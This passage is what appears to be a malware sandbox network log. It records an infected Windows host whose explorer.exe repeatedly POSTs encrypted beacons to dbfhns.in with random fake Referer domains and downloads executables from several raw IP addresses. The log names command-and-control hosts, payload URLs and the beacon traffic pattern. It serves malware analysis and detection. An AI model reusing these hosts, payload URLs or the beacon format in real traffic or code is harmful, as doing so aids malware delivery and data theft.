                                                                              May 26, 2024 10:22:30.290435076 CEST | 278 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 56 36 bf bb
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuV6|?\w|R;JADzqflE)@f}.]J]7B+h&**-W5]E;Sok3B|E#)-a
                                                                              May 26, 2024 10:22:31.303996086 CEST | 191 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:31 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1
                                                                              Data Ascii: #\-^$aD++3^|


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.4 | 49742 | 45.129.96.86 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:31.411853075 CEST | 165 | OUT | GET /file/update.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: 45.129.96.86
                                                                              May 26, 2024 10:22:32.124344110 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.22.1
                                                                              Date: Sun, 26 May 2024 08:22:31 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 325120
                                                                              Last-Modified: Sun, 26 May 2024 08:20:02 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6652f0b2-4f600"
                                                                              Accept-Ranges: bytes
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[7:Y:Y:Yh:Yh:Yh:YB:Y:X:Y1:Yh:Y1:YRich:YPELct= @pdHx@ d.text3 `.rdatal n@@.dataF~@.rsrcL@@


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.2.4 | 49743 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:32.694240093 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://fjtoifbsexibjqos.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 220
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:32.694240093 CEST | 220 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 0e 6b 2c 90 f4 76 0b 75 58 01 e4 ad
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA ,[k,vuX{hbAd#K21{mX_IQZN*=oK\5%Gt!yKF[rCt
                                                                              May 26, 2024 10:22:33.661588907 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:33 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              8 | 192.168.2.4 | 49744 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:33.788541079 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://eaiecpphhehnp.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 237
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:33.788656950 CEST | 237 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 7a 06 b7 bd
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuzWeBOdt<Vq_Z)`c( CVTPi(DU~y~M47[Cj3?>={DGX8x7WE
                                                                              May 26, 2024 10:22:34.788914919 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:34 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              9 | 192.168.2.4 | 49746 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:34.953458071 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ohbpdxbbqxsqjiv.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 190
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:35.977900028 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:35 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              10 | 192.168.2.4 | 49748 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:36.018013000 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://thknwrjryktui.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 280
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:37.056701899 CEST | 190 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:36 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              11 | 192.168.2.4 | 49749 | 23.145.40.124 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:37.156466961 CEST | 164 | OUT | GET /pintxi1lv.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: 23.145.40.124


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              12 | 192.168.2.4 | 52654 | 185.235.137.54 | 80 | 3192 | C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:44.658499956 CEST | 205 | OUT | GET /file/host_so.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Host: 185.235.137.54


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              13 | 192.168.2.4 | 52655 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:58.584278107 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://mrnhbbwrygn.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 228
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:59.613800049 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:59 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              14 | 192.168.2.4 | 52656 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:59.723663092 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://uhruuiuofju.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 236
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:23:00.708132982 CEST | 210 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:23:00 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              15 | 192.168.2.4 | 52657 | 91.202.233.231 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:23:00.812727928 CEST | 184 | OUT | GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: 91.202.233.231
                                                                              May 26, 2024 10:23:01.764164925 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:23:01 GMT
                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                              Last-Modified: Sun, 26 May 2024 08:16:06 GMT
                                                                              ETag: "205e00-619570326fd80"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 2121216
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-msdos-program


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              16 | 192.168.2.4 | 52658 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:23:03.796266079 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://gdrusktiywhw.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 181
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:23:04.997185946 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:23:04 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              17 | 192.168.2.4 | 52693 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:24:18.309649944 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://dswkxseehrq.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 278
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:19.314668894 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:19 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              18 | 192.168.2.4 | 52694 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:24:23.638001919 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://etlthdykpik.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 218
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:24.615850925 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:24 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              19 | 192.168.2.4 | 52695 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:24:28.877506018 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://urrnadxnpwvv.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 124
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:28.877542973 CEST | 124 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 61 00 b4 e9
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vua&\wUy43U,>
                                                                              May 26, 2024 10:24:29.891668081 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:29 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              20 | 192.168.2.4 | 52696 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:24:36.577363968 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://hnoddeyuysdltft.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 131
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:36.577398062 CEST | 131 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 36 ff 88
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vur6aW1my-t)G@9jf2v
                                                                              May 26, 2024 10:24:37.609268904 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:37 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              21 | 192.168.2.4 | 52697 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:24:41.911621094 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://djnjnheylgenw.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 368
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:41.911622047 CEST | 368 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 35 a8 b5
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu05OPZ`P:}ep O6fnR2&{J.:/CO_Qs`h)DNZ8&?pu;3W[6y|OY?x0qI4i29p
                                                                              May 26, 2024 10:24:42.969783068 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:42 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              22 | 192.168.2.4 | 52698 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:24:47.097794056 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://mvirbkubtmy.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 319
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:47.097794056 CEST | 319 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 3a d3 eb
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuf:ItO[$ m2ZL9e1iG10e,NY;1$lP.j*G&?8\!j2EGh SMi"
                                                                              May 26, 2024 10:24:48.101244926 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:47 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              23 | 192.168.2.4 | 52736 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:24:58.756613970 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ukxbtouqvjwpgrb.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 188
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:58.756638050 CEST | 188 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 1b d0 a9
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu5OzmwPsH[)1[:eO(W(AH)_\40|o2=(A?-
                                                                              May 26, 2024 10:24:59.751699924 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:59 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              24 | 192.168.2.4 | 52737 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:03.657069921 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://lttuitxyemp.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 159
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:03.657107115 CEST | 159 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 1e cd 83
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuWeLh]@d1?%b>dM[2Ze%7Q@a)
                                                                              May 26, 2024 10:25:04.611924887 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:04 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              25 | 192.168.2.4 | 52738 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:11.186455011 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://haljhouhmvighpi.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 159
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:11.186582088 CEST | 159 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 3b fa 90
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuE;f[Ckc&k >b4 k4K}x>PV W6Y&
                                                                              May 26, 2024 10:25:12.106934071 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:11 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              26 | 192.168.2.4 | 52739 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:25:16.590425968 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://bkjyrxsoflynogyv.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 249
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:16.590435982 CEST | 249 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 4e b4 8b
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu"NxTeyg\4|oQm6U+ce*N(K9Gd<At,ZL=iA:K!}$x*IOcM3BX?<
                                                                              May 26, 2024 10:25:17.742655993 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:17 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              27 | 192.168.2.4 | 52740 | 185.18.245.58 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
